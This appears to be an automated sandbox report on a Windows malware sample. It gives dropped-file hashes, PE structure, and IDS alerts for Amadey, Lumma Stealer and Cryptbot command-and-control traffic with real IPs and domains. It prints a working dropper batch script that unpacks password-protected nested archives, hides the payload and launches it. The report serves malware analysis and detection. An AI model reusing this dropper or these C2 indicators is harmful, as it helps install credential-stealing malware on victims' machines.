Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4299150994353544
Encrypted:	false
SSDEEP:	6:bVX7L1UEZ+lX1CGdKUe6tkHs+Zgty0l6ut0:V7BQ1CGAFBZgtV6ut0
MD5:	F9382FD2F8AD7E393D4C164EFCF04B07
SHA1:	061F7974A3DF32C9FC6BDFBA1414FA0C0813B8C9
SHA-256:	1B7FD4FC2558A820A06E26D836886AD0AB818598E771E3829AE49BD60FDBB6E3
SHA-512:	4C4D8716E983F86283E48D0CA86ED713966B7E58760000FCCAF65D2EED06C8604B364E266FC26E38F35F89F65FF74D1FC991874A51883B6869E74AEBEFBF83EE
Malicious:	false
Preview:	......*..\.G...B....F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0.................&.@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.566738977915864
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'953'216 bytes
MD5:	157e44350b06a516680ed7b7584c5e31
SHA1:	fc08a1bccbef19fc0c60be65c939ecd344c28d96
SHA256:	09bae49e2d08d3316490b621a37fa44ec46eb894133664fffb2b6202e7364c94
SHA512:	2b362a144aa0304cbaf890e6a2e63ba7f962f3772d4f74ae5c3af469466df6f5c3ed6c4bf409a5849cc6f1dce5e7cd56fd62ef1d692d4722035bc0c1c699beda
SSDEEP:	49152:OpbqeFpPw4cvv9mgxIGSapA/tQzph1LqNVwS+3ctv:Opb3bwhvv9mRapEuzp2NqSeU
TLSH:	BFD56C92F48871CFC48A16B49B33CD4169AC82B90B1458CB9D7CB8BE7D77CC515B2E29
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x70c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F568CB43DAAh
pmaxsw mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F568CB45DA5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30a2ac	0x10	kkeyqygg
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x30a25c	0x18	kkeyqygg
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	525fd1bb59be1904f93329d1dc9dc14c	False	0.997291169959128	data	7.9713345640321585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x600	1e55db351164df1643ae87d7efa3ee0f	False	0.4303385416666667	data	5.417125179370491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kkeyqygg	0x6b000	0x2a0000	0x29f400	b803b699791fc38bfb8f71321de576a1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nkvdmfgh	0x30b000	0x1000	0x400	af0e2be17c392232c633e1f67a87bcff	False	0.771484375	data	6.084805960201041	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x30c000	0x3000	0x2200	ba8a5be8f7df59a1b417a7abf9b28294	False	0.06629136029411764	DOS executable (COM)	0.747869923751593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x69454	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T13:38:06.643334+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.8	49704	185.215.113.43	80	TCP
2024-12-18T13:38:11.076185+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49708	31.41.244.11	80	TCP
2024-12-18T13:38:16.719526+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.8	49707	TCP
2024-12-18T13:38:18.056255+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	49709	185.215.113.43	80	TCP
2024-12-18T13:38:19.504325+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49710	31.41.244.11	80	TCP
2024-12-18T13:38:24.917678+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	49711	185.215.113.43	80	TCP
2024-12-18T13:38:25.669010+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.8	62284	1.1.1.1	53	UDP
2024-12-18T13:38:25.892319+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.8	60772	1.1.1.1	53	UDP
2024-12-18T13:38:26.434235+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	31.41.244.11	80	TCP
2024-12-18T13:38:27.585059+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:27.585059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:31.630080+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:31.630080+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:31.731537+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	49714	185.215.113.43	80	TCP
2024-12-18T13:38:32.967233+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:32.967233+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:33.204010+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49715	31.41.244.11	80	TCP
2024-12-18T13:38:33.268102+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:38:38.288601+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:38.288601+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:39.224868+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:38:39.224868+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:38:39.556269+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49719	104.21.23.76	443	TCP
2024-12-18T13:38:39.968181+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49718	104.21.64.80	443	TCP
2024-12-18T13:38:39.968181+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49718	104.21.64.80	443	TCP
2024-12-18T13:38:44.025378+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	49720	185.215.113.43	80	TCP
2024-12-18T13:38:44.580137+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49722	104.21.64.80	443	TCP
2024-12-18T13:38:44.580137+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49722	104.21.64.80	443	TCP
2024-12-18T13:38:45.499795+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49723	31.41.244.11	80	TCP
2024-12-18T13:38:49.448251+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49726	104.21.64.80	443	TCP
2024-12-18T13:38:49.448251+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49726	104.21.64.80	443	TCP
2024-12-18T13:38:52.719107+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:38:52.719107+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:38:53.561903+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:38:56.297913+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	49729	185.215.113.43	80	TCP
2024-12-18T13:38:56.687830+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49730	104.21.64.80	443	TCP
2024-12-18T13:38:56.687830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49730	104.21.64.80	443	TCP
2024-12-18T13:39:00.415474+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:39:00.415474+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:39:01.139241+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:39:16.968203+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.8	49762	185.185.71.170	80	TCP
2024-12-18T13:39:19.017359+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.8	49769	185.185.71.170	80	TCP
2024-12-18T13:39:28.696623+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.8	49802	185.185.71.170	80	TCP
2024-12-18T13:41:52.154565+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.8	50074	TCP
2024-12-18T13:41:53.491835+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	50076	185.215.113.43	80	TCP
2024-12-18T13:42:52.413957+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.8	50094	TCP
2024-12-18T13:42:53.750564+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.8	50096	185.215.113.43	80	TCP
2024-12-18T13:42:53.800179+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.8	63160	1.1.1.1	53	UDP
2024-12-18T13:42:55.163723+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:55.163723+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:58.019903+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:58.019903+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:59.412380+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:42:59.412380+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50099	104.21.64.80	443	TCP
